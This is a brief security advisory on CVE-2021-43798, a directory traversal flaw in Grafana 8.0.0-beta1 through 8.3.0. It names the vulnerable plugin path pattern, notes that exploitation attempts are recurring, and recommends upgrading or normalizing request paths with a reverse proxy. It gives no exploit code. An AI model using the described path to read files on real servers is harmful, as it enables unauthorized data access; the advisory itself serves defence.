CVE-2021-43798

Name of the Vulnerable Software and Affected Versions Grafana versions 8.0.0-beta1 through 8.3.0

Description Grafana is vulnerable to a directory traversal vulnerability, allowing attackers to access local files. The vulnerable URL path is: <grafana host url>/public/plugins/<plugin-id>/, where is the plugin ID for any installed plugin. Numerous reports indicate a resurgence of exploitation attempts, with attackers targeting systems internationally, including critical infrastructure. The vulnerability allows unauthorized access to local files, potentially exposing sensitive data. The vulnerability is exploitable via specifically crafted HTTP requests.

Recommendations Upgrade Grafana to version 8.0.7, 8.1.8, 8.2.7, or 8.3.1 as soon as possible. If upgrading is not feasible, implement a reverse proxy in front of Grafana to normalize the PATH of the request, such as using the normalize path setting in Envoy.